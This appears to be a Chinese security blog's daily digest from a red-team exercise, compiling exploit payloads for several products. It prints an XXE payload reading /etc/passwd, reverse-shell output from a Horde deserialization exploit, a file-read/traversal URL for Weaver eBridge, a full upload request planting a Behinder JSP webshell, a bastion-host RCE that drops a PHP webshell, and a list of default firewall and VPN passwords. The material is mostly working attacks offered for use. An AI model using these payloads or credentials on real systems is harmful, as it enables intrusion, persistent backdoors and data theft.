HW平安夜: 09/14 漏洞PAYLOAD

  • A+
所属分类:安全文章

0914HW日报☞ 来源:lemon-sec

蹲守机房的第四天,机房依旧很冷,冷的要命,尤其临近饭点还有点饥寒交迫的感觉。但是不敢松懈,要提醒自己时刻保持警惕,随时等候拔线的指令。

HW平安夜: 09/14 漏洞PAYLOAD

今天很安静,但是请别大意HW平安夜: 09/14 漏洞PAYLOAD

今天 ,你拔线了么?


满当当的昨天,
富意义的今天~

HW平安夜: 09/14 漏洞PAYLOAD


以下转载自:渗了个透

《HW平安夜: 09/13 透过迷雾》


01

Apache Cocoon XML注入 [CVE-2020-11991]


来源:http://mail-archives.apache.org/mod_mbox/cocoon-users/202009.mbox/author
程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。
1、漏洞利用条件有限必须是apacheCocoon且使用了StreamGenerator,也就是说只要传输的数据被解析就可以实现了。
2、为了大饱眼福老大哥们,小编自己写了整了一个环境。
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName
<lastName>&ent;</lastName>
</userInfo>
HW平安夜: 09/14 漏洞PAYLOAD



02

Horde Groupware Webmail Edition 远程命令执行



来源: https://srcincite.io/pocs/zdi-20-1051.py.txt

saturn:~$./poc.py 172.16.175.148/horde/ hordeuser:pass123 172.16.175.145
(+) targeting http://172.16.175.145/horde/
(+) obtained session iefankvohbl8og0mtaadm3efb6
(+) inserted our php object
(+) triggering deserialization...
(+) starting handler on port 1337
(+) connection from 172.16.175.145
(+) pop thy shell!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/horde/services


03

泛微云桥任意文件读取升级玩法



来源: 安识科技A-Team
昨天安全问题报告发出来似乎并没有玩转它,中午又收到安识科技A-Team投稿,想到一个新的思路,能够在漏洞利用过程中找到更多有用的信息。

1、简单说说昨天泛微云桥的报告,输入文件路径->读取文件内容,我们读了一下代码后发现这还能读取文件目录。
2、参数不填写绝对路径写进文本内容就是当前的目录,产生了一个新的漏“目录遍历”
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt

HW平安夜: 09/14 漏洞PAYLOAD

3、目录遍历+文件读取,我们能做的事情就很多了,比如读取管理员在桌面留下的密码文件、数据库配置文件、nginx代理配置、访问日志、D盘迅雷下载


d://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.properties
d:/OA/tomcat8/webapps/OAMS/WEB-INF/classes/dbconfig.properties 泛微OA数据库

HW平安夜: 09/14 漏洞PAYLOAD




04

某版本安X(某软)任意文件上传漏洞EXP(某软准入)



来源:https://blog.csdn.net/God_XiangYu/article/details/108555525

安X任意文件上传漏洞EXP(某软准入)

POST /uai/download/uploadfileToPath.htm HTTP/1.1HOST: xxxxx... ...
-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"Content-Type: image/png
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="uploadpath"
../webapps/notifymsg/devreport/-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

HW平安夜: 09/14 漏洞PAYLOAD

冰蝎直接连

HW平安夜: 09/14 漏洞PAYLOAD



05

宝塔面板phpMyadmin未授权访问



来源: https://mp.weixin.qq.com/s/3ZjwFo5gWlJACSkeYWQLXA

前段时间在朋友圈和微信群里火热不行的宝塔数据库面板未授权无需登录,以下是存在安全问题的版本。

- Linux正式版7.4.2

- Linux测试版7.5.13

- Windows正式版6.8

1、宝塔默认phpMyadmin端口就是888 而这个漏洞排查方式极其简单 172.10.0.121:888/pma

2、如果宝塔是存在安全问题的版本,那就会直接出现phpMyadmin面板页面。

HW平安夜: 09/14 漏洞PAYLOAD


以下转载:乌云安全

06

齐治堡垒机前台远程命令执行漏洞



来源:乌云安全

HW平安夜: 09/14 漏洞PAYLOAD

漏洞利用:

利用条件:无需登录:

第一http://10.20.10.11/listener/cluster_manage.php 返回“OK”。
第二,执行以下链接即可 getshell,执行成功后,生成 PHP 一句话马/var/www/shterm/resources/qrcode/lbj77.php 密码 10086,使用 BASE64 进行编码。这里假设 10.20.10.10 为堡垒机的 IP 地址。


HW平安夜: 09/14 漏洞PAYLOAD

特征:
漏洞利用点:


HW平安夜: 09/14 漏洞PAYLOAD



07

Exchange Server 远程代码执行漏洞


CVE-2020-16875: Exchange Server 远程代码执行漏洞(202009月度漏洞)(POC未验证)

ps版POC:https://srcincite.io/pocs/cve-2020-16875.ps1.txt

py版POC:https://srcincite.io/pocs/cve-2020-16875.py.txt



08

安全设备弱密码排查列表


来源: 热心网友提供

其实这些设备本身是没有弱密码的,用户安全意识不足使用了不安全的密码。HW平安夜: 09/14 漏洞PAYLOAD

HW平安夜: 09/14 漏洞PAYLOAD

天融信防火墙 用户名:superman 密码:talent

天融信防火墙 用户名:superman 密码:talent!23 

联想网御防火墙 用户名:admin 密码:[email protected]、administrator、[email protected]

深信服防火墙 用户名:admin 密码:admin

启明星辰 用户名:admin 密码:[email protected] 用户名:admin 密码:[email protected]

juniper 用户名:netscreen 密码:netscreen

Cisco 用户名:admin 密码:cisco

Huawei 用户名:admin 密码:[email protected] 

H3C 用户名:admin 密码:admin

绿盟IPS 用户名: weboper 密码: weboper

网神防火墙GE1 用户名:admin 密码:firewall

深信服VPN:51111端口   密码:delanrecover

华为VPN:账号:root  密码:mduadmin

华为防火墙:admin   密码:[email protected]    

EudemonJuniper防火墙:netscreen    netscreen

迪普 192.168.0.1 默认的用户名和密码(admin/admin_default)

山石 192.168.1.1 默认的管理账号为hillstone,密码为hillstone

安恒的明御防火墙 admin/adminadmin

某堡垒机 shterm/shterm

天融信的vpn test/123456


HW平安夜: 09/14 漏洞PAYLOAD

走过路过的大佬们留个关注再走呗HW平安夜: 09/14 漏洞PAYLOAD

HW平安夜: 09/14 漏洞PAYLOAD

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: